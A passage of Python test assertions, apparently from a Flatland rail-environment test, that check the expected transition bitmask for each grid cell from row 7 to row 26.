assert env.rail.get_full_transitions(7, 21) == 0, "[7][21]"
assert env.rail.get_full_transitions(7, 22) == 0, "[7][22]"
assert env.rail.get_full_transitions(7, 23) == 0, "[7][23]"
assert env.rail.get_full_transitions(7, 24) == 0, "[7][24]"
assert env.rail.get_full_transitions(8, 0) == 32800, "[8][0]"
assert env.rail.get_full_transitions(8, 1) == 32800, "[8][1]"
assert env.rail.get_full_transitions(8, 2) == 0, "[8][2]"
assert env.rail.get_full_transitions(8, 3) == 0, "[8][3]"
assert env.rail.get_full_transitions(8, 4) == 0, "[8][4]"
assert env.rail.get_full_transitions(8, 5) == 0, "[8][5]"
assert env.rail.get_full_transitions(8, 6) == 0, "[8][6]"
assert env.rail.get_full_transitions(8, 7) == 0, "[8][7]"
assert env.rail.get_full_transitions(8, 8) == 0, "[8][8]"
assert env.rail.get_full_transitions(8, 9) == 0, "[8][9]"
assert env.rail.get_full_transitions(8, 10) == 0, "[8][10]"
assert env.rail.get_full_transitions(8, 11) == 0, "[8][11]"
assert env.rail.get_full_transitions(8, 12) == 0, "[8][12]"
assert env.rail.get_full_transitions(8, 13) == 0, "[8][13]"
assert env.rail.get_full_transitions(8, 14) == 0, "[8][14]"
assert env.rail.get_full_transitions(8, 15) == 0, "[8][15]"
assert env.rail.get_full_transitions(8, 16) == 0, "[8][16]"
assert env.rail.get_full_transitions(8, 17) == 0, "[8][17]"
assert env.rail.get_full_transitions(8, 18) == 0, "[8][18]"
assert env.rail.get_full_transitions(8, 19) == 32872, "[8][19]"
assert env.rail.get_full_transitions(8, 20) == 37408, "[8][20]"
assert env.rail.get_full_transitions(8, 21) == 0, "[8][21]"
assert env.rail.get_full_transitions(8, 22) == 0, "[8][22]"
assert env.rail.get_full_transitions(8, 23) == 0, "[8][23]"
assert env.rail.get_full_transitions(8, 24) == 0, "[8][24]"
assert env.rail.get_full_transitions(9, 0) == 32800, "[9][0]"
assert env.rail.get_full_transitions(9, 1) == 32800, "[9][1]"
assert env.rail.get_full_transitions(9, 2) == 0, "[9][2]"
assert env.rail.get_full_transitions(9, 3) == 0, "[9][3]"
assert env.rail.get_full_transitions(9, 4) == 0, "[9][4]"
assert env.rail.get_full_transitions(9, 5) == 0, "[9][5]"
assert env.rail.get_full_transitions(9, 6) == 0, "[9][6]"
assert env.rail.get_full_transitions(9, 7) == 0, "[9][7]"
assert env.rail.get_full_transitions(9, 8) == 0, "[9][8]"
assert env.rail.get_full_transitions(9, 9) == 0, "[9][9]"
assert env.rail.get_full_transitions(9, 10) == 0, "[9][10]"
assert env.rail.get_full_transitions(9, 11) == 0, "[9][11]"
assert env.rail.get_full_transitions(9, 12) == 0, "[9][12]"
assert env.rail.get_full_transitions(9, 13) == 0, "[9][13]"
assert env.rail.get_full_transitions(9, 14) == 0, "[9][14]"
assert env.rail.get_full_transitions(9, 15) == 0, "[9][15]"
assert env.rail.get_full_transitions(9, 16) == 0, "[9][16]"
assert env.rail.get_full_transitions(9, 17) == 0, "[9][17]"
assert env.rail.get_full_transitions(9, 18) == 0, "[9][18]"
assert env.rail.get_full_transitions(9, 19) == 49186, "[9][19]"
assert env.rail.get_full_transitions(9, 20) == 2064, "[9][20]"
assert env.rail.get_full_transitions(9, 21) == 0, "[9][21]"
assert env.rail.get_full_transitions(9, 22) == 0, "[9][22]"
assert env.rail.get_full_transitions(9, 23) == 0, "[9][23]"
assert env.rail.get_full_transitions(9, 24) == 0, "[9][24]"
assert env.rail.get_full_transitions(10, 0) == 32800, "[10][0]"
assert env.rail.get_full_transitions(10, 1) == 32800, "[10][1]"
assert env.rail.get_full_transitions(10, 2) == 0, "[10][2]"
assert env.rail.get_full_transitions(10, 3) == 0, "[10][3]"
assert env.rail.get_full_transitions(10, 4) == 0, "[10][4]"
assert env.rail.get_full_transitions(10, 5) == 0, "[10][5]"
assert env.rail.get_full_transitions(10, 6) == 0, "[10][6]"
assert env.rail.get_full_transitions(10, 7) == 0, "[10][7]"
assert env.rail.get_full_transitions(10, 8) == 0, "[10][8]"
assert env.rail.get_full_transitions(10, 9) == 0, "[10][9]"
assert env.rail.get_full_transitions(10, 10) == 0, "[10][10]"
assert env.rail.get_full_transitions(10, 11) == 0, "[10][11]"
assert env.rail.get_full_transitions(10, 12) == 0, "[10][12]"
assert env.rail.get_full_transitions(10, 13) == 0, "[10][13]"
assert env.rail.get_full_transitions(10, 14) == 0, "[10][14]"
assert env.rail.get_full_transitions(10, 15) == 0, "[10][15]"
assert env.rail.get_full_transitions(10, 16) == 0, "[10][16]"
assert env.rail.get_full_transitions(10, 17) == 0, "[10][17]"
assert env.rail.get_full_transitions(10, 18) == 0, "[10][18]"
assert env.rail.get_full_transitions(10, 19) == 32800, "[10][19]"
assert env.rail.get_full_transitions(10, 20) == 0, "[10][20]"
assert env.rail.get_full_transitions(10, 21) == 0, "[10][21]"
assert env.rail.get_full_transitions(10, 22) == 0, "[10][22]"
assert env.rail.get_full_transitions(10, 23) == 0, "[10][23]"
assert env.rail.get_full_transitions(10, 24) == 0, "[10][24]"
assert env.rail.get_full_transitions(11, 0) == 32800, "[11][0]"
assert env.rail.get_full_transitions(11, 1) == 32800, "[11][1]"
assert env.rail.get_full_transitions(11, 2) == 0, "[11][2]"
assert env.rail.get_full_transitions(11, 3) == 0, "[11][3]"
assert env.rail.get_full_transitions(11, 4) == 0, "[11][4]"
assert env.rail.get_full_transitions(11, 5) == 0, "[11][5]"
assert env.rail.get_full_transitions(11, 6) == 0, "[11][6]"
assert env.rail.get_full_transitions(11, 7) == 0, "[11][7]"
assert env.rail.get_full_transitions(11, 8) == 0, "[11][8]"
assert env.rail.get_full_transitions(11, 9) == 0, "[11][9]"
assert env.rail.get_full_transitions(11, 10) == 0, "[11][10]"
assert env.rail.get_full_transitions(11, 11) == 0, "[11][11]"
assert env.rail.get_full_transitions(11, 12) == 0, "[11][12]"
assert env.rail.get_full_transitions(11, 13) == 0, "[11][13]"
assert env.rail.get_full_transitions(11, 14) == 0, "[11][14]"
assert env.rail.get_full_transitions(11, 15) == 0, "[11][15]"
assert env.rail.get_full_transitions(11, 16) == 0, "[11][16]"
assert env.rail.get_full_transitions(11, 17) == 0, "[11][17]"
assert env.rail.get_full_transitions(11, 18) == 0, "[11][18]"
assert env.rail.get_full_transitions(11, 19) == 32872, "[11][19]"
assert env.rail.get_full_transitions(11, 20) == 5633, "[11][20]"
assert env.rail.get_full_transitions(11, 21) == 4608, "[11][21]"
assert env.rail.get_full_transitions(11, 22) == 0, "[11][22]"
assert env.rail.get_full_transitions(11, 23) == 0, "[11][23]"
assert env.rail.get_full_transitions(11, 24) == 0, "[11][24]"
assert env.rail.get_full_transitions(12, 0) == 32800, "[12][0]"
assert env.rail.get_full_transitions(12, 1) == 32800, "[12][1]"
assert env.rail.get_full_transitions(12, 2) == 0, "[12][2]"
assert env.rail.get_full_transitions(12, 3) == 0, "[12][3]"
assert env.rail.get_full_transitions(12, 4) == 0, "[12][4]"
assert env.rail.get_full_transitions(12, 5) == 0, "[12][5]"
assert env.rail.get_full_transitions(12, 6) == 0, "[12][6]"
assert env.rail.get_full_transitions(12, 7) == 0, "[12][7]"
assert env.rail.get_full_transitions(12, 8) == 0, "[12][8]"
assert env.rail.get_full_transitions(12, 9) == 0, "[12][9]"
assert env.rail.get_full_transitions(12, 10) == 0, "[12][10]"
assert env.rail.get_full_transitions(12, 11) == 0, "[12][11]"
assert env.rail.get_full_transitions(12, 12) == 0, "[12][12]"
assert env.rail.get_full_transitions(12, 13) == 0, "[12][13]"
assert env.rail.get_full_transitions(12, 14) == 0, "[12][14]"
assert env.rail.get_full_transitions(12, 15) == 0, "[12][15]"
assert env.rail.get_full_transitions(12, 16) == 0, "[12][16]"
assert env.rail.get_full_transitions(12, 17) == 0, "[12][17]"
assert env.rail.get_full_transitions(12, 18) == 0, "[12][18]"
assert env.rail.get_full_transitions(12, 19) == 32800, "[12][19]"
assert env.rail.get_full_transitions(12, 20) == 32800, "[12][20]"
assert env.rail.get_full_transitions(12, 21) == 32800, "[12][21]"
assert env.rail.get_full_transitions(12, 22) == 0, "[12][22]"
assert env.rail.get_full_transitions(12, 23) == 0, "[12][23]"
assert env.rail.get_full_transitions(12, 24) == 0, "[12][24]"
assert env.rail.get_full_transitions(13, 0) == 32800, "[13][0]"
assert env.rail.get_full_transitions(13, 1) == 32800, "[13][1]"
assert env.rail.get_full_transitions(13, 2) == 0, "[13][2]"
assert env.rail.get_full_transitions(13, 3) == 0, "[13][3]"
assert env.rail.get_full_transitions(13, 4) == 0, "[13][4]"
assert env.rail.get_full_transitions(13, 5) == 0, "[13][5]"
assert env.rail.get_full_transitions(13, 6) == 0, "[13][6]"
assert env.rail.get_full_transitions(13, 7) == 0, "[13][7]"
assert env.rail.get_full_transitions(13, 8) == 0, "[13][8]"
assert env.rail.get_full_transitions(13, 9) == 0, "[13][9]"
assert env.rail.get_full_transitions(13, 10) == 0, "[13][10]"
assert env.rail.get_full_transitions(13, 11) == 0, "[13][11]"
assert env.rail.get_full_transitions(13, 12) == 0, "[13][12]"
assert env.rail.get_full_transitions(13, 13) == 0, "[13][13]"
assert env.rail.get_full_transitions(13, 14) == 0, "[13][14]"
assert env.rail.get_full_transitions(13, 15) == 0, "[13][15]"
assert env.rail.get_full_transitions(13, 16) == 0, "[13][16]"
assert env.rail.get_full_transitions(13, 17) == 0, "[13][17]"
assert env.rail.get_full_transitions(13, 18) == 0, "[13][18]"
assert env.rail.get_full_transitions(13, 19) == 32800, "[13][19]"
assert env.rail.get_full_transitions(13, 20) == 32800, "[13][20]"
assert env.rail.get_full_transitions(13, 21) == 32800, "[13][21]"
assert env.rail.get_full_transitions(13, 22) == 0, "[13][22]"
assert env.rail.get_full_transitions(13, 23) == 0, "[13][23]"
assert env.rail.get_full_transitions(13, 24) == 0, "[13][24]"
assert env.rail.get_full_transitions(14, 0) == 32800, "[14][0]"
assert env.rail.get_full_transitions(14, 1) == 32800, "[14][1]"
assert env.rail.get_full_transitions(14, 2) == 0, "[14][2]"
assert env.rail.get_full_transitions(14, 3) == 0, "[14][3]"
assert env.rail.get_full_transitions(14, 4) == 0, "[14][4]"
assert env.rail.get_full_transitions(14, 5) == 0, "[14][5]"
assert env.rail.get_full_transitions(14, 6) == 0, "[14][6]"
assert env.rail.get_full_transitions(14, 7) == 0, "[14][7]"
assert env.rail.get_full_transitions(14, 8) == 0, "[14][8]"
assert env.rail.get_full_transitions(14, 9) == 0, "[14][9]"
assert env.rail.get_full_transitions(14, 10) == 0, "[14][10]"
assert env.rail.get_full_transitions(14, 11) == 0, "[14][11]"
assert env.rail.get_full_transitions(14, 12) == 0, "[14][12]"
assert env.rail.get_full_transitions(14, 13) == 0, "[14][13]"
assert env.rail.get_full_transitions(14, 14) == 0, "[14][14]"
assert env.rail.get_full_transitions(14, 15) == 0, "[14][15]"
assert env.rail.get_full_transitions(14, 16) == 0, "[14][16]"
assert env.rail.get_full_transitions(14, 17) == 0, "[14][17]"
assert env.rail.get_full_transitions(14, 18) == 0, "[14][18]"
assert env.rail.get_full_transitions(14, 19) == 32800, "[14][19]"
assert env.rail.get_full_transitions(14, 20) == 32800, "[14][20]"
assert env.rail.get_full_transitions(14, 21) == 32800, "[14][21]"
assert env.rail.get_full_transitions(14, 22) == 0, "[14][22]"
assert env.rail.get_full_transitions(14, 23) == 0, "[14][23]"
assert env.rail.get_full_transitions(14, 24) == 0, "[14][24]"
assert env.rail.get_full_transitions(15, 0) == 32800, "[15][0]"
assert env.rail.get_full_transitions(15, 1) == 32800, "[15][1]"
assert env.rail.get_full_transitions(15, 2) == 0, "[15][2]"
assert env.rail.get_full_transitions(15, 3) == 0, "[15][3]"
assert env.rail.get_full_transitions(15, 4) == 0, "[15][4]"
assert env.rail.get_full_transitions(15, 5) == 0, "[15][5]"
assert env.rail.get_full_transitions(15, 6) == 0, "[15][6]"
assert env.rail.get_full_transitions(15, 7) == 0, "[15][7]"
assert env.rail.get_full_transitions(15, 8) == 0, "[15][8]"
assert env.rail.get_full_transitions(15, 9) == 0, "[15][9]"
assert env.rail.get_full_transitions(15, 10) == 0, "[15][10]"
assert env.rail.get_full_transitions(15, 11) == 0, "[15][11]"
assert env.rail.get_full_transitions(15, 12) == 0, "[15][12]"
assert env.rail.get_full_transitions(15, 13) == 0, "[15][13]"
assert env.rail.get_full_transitions(15, 14) == 0, "[15][14]"
assert env.rail.get_full_transitions(15, 15) == 0, "[15][15]"
assert env.rail.get_full_transitions(15, 16) == 0, "[15][16]"
assert env.rail.get_full_transitions(15, 17) == 0, "[15][17]"
assert env.rail.get_full_transitions(15, 18) == 0, "[15][18]"
assert env.rail.get_full_transitions(15, 19) == 32800, "[15][19]"
assert env.rail.get_full_transitions(15, 20) == 32800, "[15][20]"
assert env.rail.get_full_transitions(15, 21) == 32800, "[15][21]"
assert env.rail.get_full_transitions(15, 22) == 0, "[15][22]"
assert env.rail.get_full_transitions(15, 23) == 0, "[15][23]"
assert env.rail.get_full_transitions(15, 24) == 0, "[15][24]"
assert env.rail.get_full_transitions(16, 0) == 32800, "[16][0]"
assert env.rail.get_full_transitions(16, 1) == 32800, "[16][1]"
assert env.rail.get_full_transitions(16, 2) == 0, "[16][2]"
assert env.rail.get_full_transitions(16, 3) == 0, "[16][3]"
assert env.rail.get_full_transitions(16, 4) == 0, "[16][4]"
assert env.rail.get_full_transitions(16, 5) == 0, "[16][5]"
assert env.rail.get_full_transitions(16, 6) == 0, "[16][6]"
assert env.rail.get_full_transitions(16, 7) == 0, "[16][7]"
assert env.rail.get_full_transitions(16, 8) == 0, "[16][8]"
assert env.rail.get_full_transitions(16, 9) == 0, "[16][9]"
assert env.rail.get_full_transitions(16, 10) == 0, "[16][10]"
assert env.rail.get_full_transitions(16, 11) == 0, "[16][11]"
assert env.rail.get_full_transitions(16, 12) == 0, "[16][12]"
assert env.rail.get_full_transitions(16, 13) == 0, "[16][13]"
assert env.rail.get_full_transitions(16, 14) == 0, "[16][14]"
assert env.rail.get_full_transitions(16, 15) == 0, "[16][15]"
assert env.rail.get_full_transitions(16, 16) == 0, "[16][16]"
assert env.rail.get_full_transitions(16, 17) == 0, "[16][17]"
assert env.rail.get_full_transitions(16, 18) == 0, "[16][18]"
assert env.rail.get_full_transitions(16, 19) == 32800, "[16][19]"
assert env.rail.get_full_transitions(16, 20) == 32800, "[16][20]"
assert env.rail.get_full_transitions(16, 21) == 32800, "[16][21]"
assert env.rail.get_full_transitions(16, 22) == 0, "[16][22]"
assert env.rail.get_full_transitions(16, 23) == 0, "[16][23]"
assert env.rail.get_full_transitions(16, 24) == 0, "[16][24]"
assert env.rail.get_full_transitions(17, 0) == 32800, "[17][0]"
assert env.rail.get_full_transitions(17, 1) == 32800, "[17][1]"
assert env.rail.get_full_transitions(17, 2) == 0, "[17][2]"
assert env.rail.get_full_transitions(17, 3) == 0, "[17][3]"
assert env.rail.get_full_transitions(17, 4) == 0, "[17][4]"
assert env.rail.get_full_transitions(17, 5) == 0, "[17][5]"
assert env.rail.get_full_transitions(17, 6) == 0, "[17][6]"
assert env.rail.get_full_transitions(17, 7) == 0, "[17][7]"
assert env.rail.get_full_transitions(17, 8) == 0, "[17][8]"
assert env.rail.get_full_transitions(17, 9) == 0, "[17][9]"
assert env.rail.get_full_transitions(17, 10) == 0, "[17][10]"
assert env.rail.get_full_transitions(17, 11) == 0, "[17][11]"
assert env.rail.get_full_transitions(17, 12) == 0, "[17][12]"
assert env.rail.get_full_transitions(17, 13) == 0, "[17][13]"
assert env.rail.get_full_transitions(17, 14) == 0, "[17][14]"
assert env.rail.get_full_transitions(17, 15) == 0, "[17][15]"
assert env.rail.get_full_transitions(17, 16) == 0, "[17][16]"
assert env.rail.get_full_transitions(17, 17) == 0, "[17][17]"
assert env.rail.get_full_transitions(17, 18) == 0, "[17][18]"
assert env.rail.get_full_transitions(17, 19) == 32800, "[17][19]"
assert env.rail.get_full_transitions(17, 20) == 32800, "[17][20]"
assert env.rail.get_full_transitions(17, 21) == 32800, "[17][21]"
assert env.rail.get_full_transitions(17, 22) == 0, "[17][22]"
assert env.rail.get_full_transitions(17, 23) == 0, "[17][23]"
assert env.rail.get_full_transitions(17, 24) == 0, "[17][24]"
assert env.rail.get_full_transitions(18, 0) == 72, "[18][0]"
assert env.rail.get_full_transitions(18, 1) == 37408, "[18][1]"
assert env.rail.get_full_transitions(18, 2) == 0, "[18][2]"
assert env.rail.get_full_transitions(18, 3) == 0, "[18][3]"
assert env.rail.get_full_transitions(18, 4) == 0, "[18][4]"
assert env.rail.get_full_transitions(18, 5) == 0, "[18][5]"
assert env.rail.get_full_transitions(18, 6) == 0, "[18][6]"
assert env.rail.get_full_transitions(18, 7) == 0, "[18][7]"
assert env.rail.get_full_transitions(18, 8) == 0, "[18][8]"
assert env.rail.get_full_transitions(18, 9) == 0, "[18][9]"
assert env.rail.get_full_transitions(18, 10) == 0, "[18][10]"
assert env.rail.get_full_transitions(18, 11) == 0, "[18][11]"
assert env.rail.get_full_transitions(18, 12) == 0, "[18][12]"
assert env.rail.get_full_transitions(18, 13) == 0, "[18][13]"
assert env.rail.get_full_transitions(18, 14) == 0, "[18][14]"
assert env.rail.get_full_transitions(18, 15) == 0, "[18][15]"
assert env.rail.get_full_transitions(18, 16) == 0, "[18][16]"
assert env.rail.get_full_transitions(18, 17) == 0, "[18][17]"
assert env.rail.get_full_transitions(18, 18) == 0, "[18][18]"
assert env.rail.get_full_transitions(18, 19) == 32800, "[18][19]"
assert env.rail.get_full_transitions(18, 20) == 32800, "[18][20]"
assert env.rail.get_full_transitions(18, 21) == 32800, "[18][21]"
assert env.rail.get_full_transitions(18, 22) == 0, "[18][22]"
assert env.rail.get_full_transitions(18, 23) == 0, "[18][23]"
assert env.rail.get_full_transitions(18, 24) == 0, "[18][24]"
assert env.rail.get_full_transitions(19, 0) == 0, "[19][0]"
assert env.rail.get_full_transitions(19, 1) == 32800, "[19][1]"
assert env.rail.get_full_transitions(19, 2) == 0, "[19][2]"
assert env.rail.get_full_transitions(19, 3) == 0, "[19][3]"
assert env.rail.get_full_transitions(19, 4) == 0, "[19][4]"
assert env.rail.get_full_transitions(19, 5) == 0, "[19][5]"
assert env.rail.get_full_transitions(19, 6) == 0, "[19][6]"
assert env.rail.get_full_transitions(19, 7) == 0, "[19][7]"
assert env.rail.get_full_transitions(19, 8) == 0, "[19][8]"
assert env.rail.get_full_transitions(19, 9) == 0, "[19][9]"
assert env.rail.get_full_transitions(19, 10) == 0, "[19][10]"
assert env.rail.get_full_transitions(19, 11) == 0, "[19][11]"
assert env.rail.get_full_transitions(19, 12) == 0, "[19][12]"
assert env.rail.get_full_transitions(19, 13) == 0, "[19][13]"
assert env.rail.get_full_transitions(19, 14) == 16386, "[19][14]"
assert env.rail.get_full_transitions(19, 15) == 1025, "[19][15]"
assert env.rail.get_full_transitions(19, 16) == 1025, "[19][16]"
assert env.rail.get_full_transitions(19, 17) == 1025, "[19][17]"
assert env.rail.get_full_transitions(19, 18) == 1025, "[19][18]"
assert env.rail.get_full_transitions(19, 19) == 37408, "[19][19]"
assert env.rail.get_full_transitions(19, 20) == 32800, "[19][20]"
assert env.rail.get_full_transitions(19, 21) == 32800, "[19][21]"
assert env.rail.get_full_transitions(19, 22) == 0, "[19][22]"
assert env.rail.get_full_transitions(19, 23) == 0, "[19][23]"
assert env.rail.get_full_transitions(19, 24) == 0, "[19][24]"
assert env.rail.get_full_transitions(20, 0) == 0, "[20][0]"
assert env.rail.get_full_transitions(20, 1) == 32800, "[20][1]"
assert env.rail.get_full_transitions(20, 2) == 0, "[20][2]"
assert env.rail.get_full_transitions(20, 3) == 0, "[20][3]"
assert env.rail.get_full_transitions(20, 4) == 0, "[20][4]"
assert env.rail.get_full_transitions(20, 5) == 0, "[20][5]"
assert env.rail.get_full_transitions(20, 6) == 0, "[20][6]"
assert env.rail.get_full_transitions(20, 7) == 0, "[20][7]"
assert env.rail.get_full_transitions(20, 8) == 0, "[20][8]"
assert env.rail.get_full_transitions(20, 9) == 0, "[20][9]"
assert env.rail.get_full_transitions(20, 10) == 0, "[20][10]"
assert env.rail.get_full_transitions(20, 11) == 0, "[20][11]"
assert env.rail.get_full_transitions(20, 12) == 0, "[20][12]"
assert env.rail.get_full_transitions(20, 13) == 0, "[20][13]"
assert env.rail.get_full_transitions(20, 14) == 32800, "[20][14]"
assert env.rail.get_full_transitions(20, 15) == 0, "[20][15]"
assert env.rail.get_full_transitions(20, 16) == 0, "[20][16]"
assert env.rail.get_full_transitions(20, 17) == 0, "[20][17]"
assert env.rail.get_full_transitions(20, 18) == 0, "[20][18]"
assert env.rail.get_full_transitions(20, 19) == 32800, "[20][19]"
assert env.rail.get_full_transitions(20, 20) == 32800, "[20][20]"
assert env.rail.get_full_transitions(20, 21) == 32800, "[20][21]"
assert env.rail.get_full_transitions(20, 22) == 0, "[20][22]"
assert env.rail.get_full_transitions(20, 23) == 0, "[20][23]"
assert env.rail.get_full_transitions(20, 24) == 0, "[20][24]"
assert env.rail.get_full_transitions(21, 0) == 0, "[21][0]"
assert env.rail.get_full_transitions(21, 1) == 32800, "[21][1]"
assert env.rail.get_full_transitions(21, 2) == 0, "[21][2]"
assert env.rail.get_full_transitions(21, 3) == 0, "[21][3]"
assert env.rail.get_full_transitions(21, 4) == 0, "[21][4]"
assert env.rail.get_full_transitions(21, 5) == 0, "[21][5]"
assert env.rail.get_full_transitions(21, 6) == 0, "[21][6]"
assert env.rail.get_full_transitions(21, 7) == 0, "[21][7]"
assert env.rail.get_full_transitions(21, 8) == 0, "[21][8]"
assert env.rail.get_full_transitions(21, 9) == 0, "[21][9]"
assert env.rail.get_full_transitions(21, 10) == 0, "[21][10]"
assert env.rail.get_full_transitions(21, 11) == 0, "[21][11]"
assert env.rail.get_full_transitions(21, 12) == 0, "[21][12]"
assert env.rail.get_full_transitions(21, 13) == 0, "[21][13]"
assert env.rail.get_full_transitions(21, 14) == 32800, "[21][14]"
assert env.rail.get_full_transitions(21, 15) == 0, "[21][15]"
assert env.rail.get_full_transitions(21, 16) == 0, "[21][16]"
assert env.rail.get_full_transitions(21, 17) == 0, "[21][17]"
assert env.rail.get_full_transitions(21, 18) == 0, "[21][18]"
assert env.rail.get_full_transitions(21, 19) == 32872, "[21][19]"
assert env.rail.get_full_transitions(21, 20) == 37408, "[21][20]"
assert env.rail.get_full_transitions(21, 21) == 32800, "[21][21]"
assert env.rail.get_full_transitions(21, 22) == 0, "[21][22]"
assert env.rail.get_full_transitions(21, 23) == 0, "[21][23]"
assert env.rail.get_full_transitions(21, 24) == 0, "[21][24]"
assert env.rail.get_full_transitions(22, 0) == 0, "[22][0]"
assert env.rail.get_full_transitions(22, 1) == 32800, "[22][1]"
assert env.rail.get_full_transitions(22, 2) == 0, "[22][2]"
assert env.rail.get_full_transitions(22, 3) == 0, "[22][3]"
assert env.rail.get_full_transitions(22, 4) == 0, "[22][4]"
assert env.rail.get_full_transitions(22, 5) == 0, "[22][5]"
assert env.rail.get_full_transitions(22, 6) == 0, "[22][6]"
assert env.rail.get_full_transitions(22, 7) == 0, "[22][7]"
assert env.rail.get_full_transitions(22, 8) == 0, "[22][8]"
assert env.rail.get_full_transitions(22, 9) == 0, "[22][9]"
assert env.rail.get_full_transitions(22, 10) == 0, "[22][10]"
assert env.rail.get_full_transitions(22, 11) == 0, "[22][11]"
assert env.rail.get_full_transitions(22, 12) == 0, "[22][12]"
assert env.rail.get_full_transitions(22, 13) == 0, "[22][13]"
assert env.rail.get_full_transitions(22, 14) == 32800, "[22][14]"
assert env.rail.get_full_transitions(22, 15) == 0, "[22][15]"
assert env.rail.get_full_transitions(22, 16) == 0, "[22][16]"
assert env.rail.get_full_transitions(22, 17) == 0, "[22][17]"
assert env.rail.get_full_transitions(22, 18) == 0, "[22][18]"
assert env.rail.get_full_transitions(22, 19) == 49186, "[22][19]"
assert env.rail.get_full_transitions(22, 20) == 34864, "[22][20]"
assert env.rail.get_full_transitions(22, 21) == 32800, "[22][21]"
assert env.rail.get_full_transitions(22, 22) == 0, "[22][22]"
assert env.rail.get_full_transitions(22, 23) == 0, "[22][23]"
assert env.rail.get_full_transitions(22, 24) == 0, "[22][24]"
assert env.rail.get_full_transitions(23, 0) == 0, "[23][0]"
assert env.rail.get_full_transitions(23, 1) == 32800, "[23][1]"
assert env.rail.get_full_transitions(23, 2) == 0, "[23][2]"
assert env.rail.get_full_transitions(23, 3) == 0, "[23][3]"
assert env.rail.get_full_transitions(23, 4) == 0, "[23][4]"
assert env.rail.get_full_transitions(23, 5) == 16386, "[23][5]"
assert env.rail.get_full_transitions(23, 6) == 1025, "[23][6]"
assert env.rail.get_full_transitions(23, 7) == 4608, "[23][7]"
assert env.rail.get_full_transitions(23, 8) == 0, "[23][8]"
assert env.rail.get_full_transitions(23, 9) == 0, "[23][9]"
assert env.rail.get_full_transitions(23, 10) == 0, "[23][10]"
assert env.rail.get_full_transitions(23, 11) == 0, "[23][11]"
assert env.rail.get_full_transitions(23, 12) == 0, "[23][12]"
assert env.rail.get_full_transitions(23, 13) == 0, "[23][13]"
assert env.rail.get_full_transitions(23, 14) == 32800, "[23][14]"
assert env.rail.get_full_transitions(23, 15) == 0, "[23][15]"
assert env.rail.get_full_transitions(23, 16) == 0, "[23][16]"
assert env.rail.get_full_transitions(23, 17) == 0, "[23][17]"
assert env.rail.get_full_transitions(23, 18) == 0, "[23][18]"
assert env.rail.get_full_transitions(23, 19) == 32800, "[23][19]"
assert env.rail.get_full_transitions(23, 20) == 32872, "[23][20]"
assert env.rail.get_full_transitions(23, 21) == 37408, "[23][21]"
assert env.rail.get_full_transitions(23, 22) == 0, "[23][22]"
assert env.rail.get_full_transitions(23, 23) == 0, "[23][23]"
assert env.rail.get_full_transitions(23, 24) == 0, "[23][24]"
assert env.rail.get_full_transitions(24, 0) == 0, "[24][0]"
assert env.rail.get_full_transitions(24, 1) == 72, "[24][1]"
assert env.rail.get_full_transitions(24, 2) == 1025, "[24][2]"
assert env.rail.get_full_transitions(24, 3) == 5633, "[24][3]"
assert env.rail.get_full_transitions(24, 4) == 17411, "[24][4]"
assert env.rail.get_full_transitions(24, 5) == 3089, "[24][5]"
assert env.rail.get_full_transitions(24, 6) == 1025, "[24][6]"
assert env.rail.get_full_transitions(24, 7) == 1097, "[24][7]"
assert env.rail.get_full_transitions(24, 8) == 5633, "[24][8]"
assert env.rail.get_full_transitions(24, 9) == 17411, "[24][9]"
assert env.rail.get_full_transitions(24, 10) == 1025, "[24][10]"
assert env.rail.get_full_transitions(24, 11) == 5633, "[24][11]"
assert env.rail.get_full_transitions(24, 12) == 1025, "[24][12]"
assert env.rail.get_full_transitions(24, 13) == 1025, "[24][13]"
assert env.rail.get_full_transitions(24, 14) == 2064, "[24][14]"
assert env.rail.get_full_transitions(24, 15) == 0, "[24][15]"
assert env.rail.get_full_transitions(24, 16) == 0, "[24][16]"
assert env.rail.get_full_transitions(24, 17) == 0, "[24][17]"
assert env.rail.get_full_transitions(24, 18) == 0, "[24][18]"
assert env.rail.get_full_transitions(24, 19) == 32800, "[24][19]"
assert env.rail.get_full_transitions(24, 20) == 32800, "[24][20]"
assert env.rail.get_full_transitions(24, 21) == 32800, "[24][21]"
assert env.rail.get_full_transitions(24, 22) == 0, "[24][22]"
assert env.rail.get_full_transitions(24, 23) == 0, "[24][23]"
assert env.rail.get_full_transitions(24, 24) == 0, "[24][24]"
assert env.rail.get_full_transitions(25, 0) == 0, "[25][0]"
assert env.rail.get_full_transitions(25, 1) == 0, "[25][1]"
assert env.rail.get_full_transitions(25, 2) == 0, "[25][2]"
assert env.rail.get_full_transitions(25, 3) == 72, "[25][3]"
assert env.rail.get_full_transitions(25, 4) == 3089, "[25][4]"
assert env.rail.get_full_transitions(25, 5) == 5633, "[25][5]"
assert env.rail.get_full_transitions(25, 6) == 1025, "[25][6]"
assert env.rail.get_full_transitions(25, 7) == 17411, "[25][7]"
assert env.rail.get_full_transitions(25, 8) == 1097, "[25][8]"
assert env.rail.get_full_transitions(25, 9) == 2064, "[25][9]"
assert env.rail.get_full_transitions(25, 10) == 0, "[25][10]"
assert env.rail.get_full_transitions(25, 11) == 32872, "[25][11]"
assert env.rail.get_full_transitions(25, 12) == 5633, "[25][12]"
assert env.rail.get_full_transitions(25, 13) == 4608, "[25][13]"
assert env.rail.get_full_transitions(25, 14) == 0, "[25][14]"
assert env.rail.get_full_transitions(25, 15) == 0, "[25][15]"
assert env.rail.get_full_transitions(25, 16) == 0, "[25][16]"
assert env.rail.get_full_transitions(25, 17) == 0, "[25][17]"
assert env.rail.get_full_transitions(25, 18) == 0, "[25][18]"
assert env.rail.get_full_transitions(25, 19) == 32800, "[25][19]"
assert env.rail.get_full_transitions(25, 20) == 49186, "[25][20]"
assert env.rail.get_full_transitions(25, 21) == 34864, "[25][21]"
assert env.rail.get_full_transitions(25, 22) == 0, "[25][22]"
assert env.rail.get_full_transitions(25, 23) == 0, "[25][23]"
assert env.rail.get_full_transitions(25, 24) == 0, "[25][24]"
assert env.rail.get_full_transitions(26, 0) == 0, "[26][0]"
assert env.rail.get_full_transitions(26, 1) == 0, "[26][1]"
assert env.rail.get_full_transitions(26, 2) == 0, "[26][2]"
assert env.rail.get_full_transitions(26, 3) == 0, "[26][3]"
assert env.rail.get_full_transitions(26, 4) == 0, "[26][4]"
assert env.rail.get_full_transitions(26, 5) == 72, "[26][5]"
assert env.rail.get_full_transitions(26, 6) == 1025, "[26][6]"
assert env.rail.get_full_transitions(26, 7) == 2064, "[26][7]"
assert env.rail.get_full_transitions(26, 8) == 0, "[26][8]"
assert env.rail.get_full_transitions(26, 9) == 0, "[26][9]"
assert env.rail.get_full_transitions(26, 10) == 0, "[26][10]"
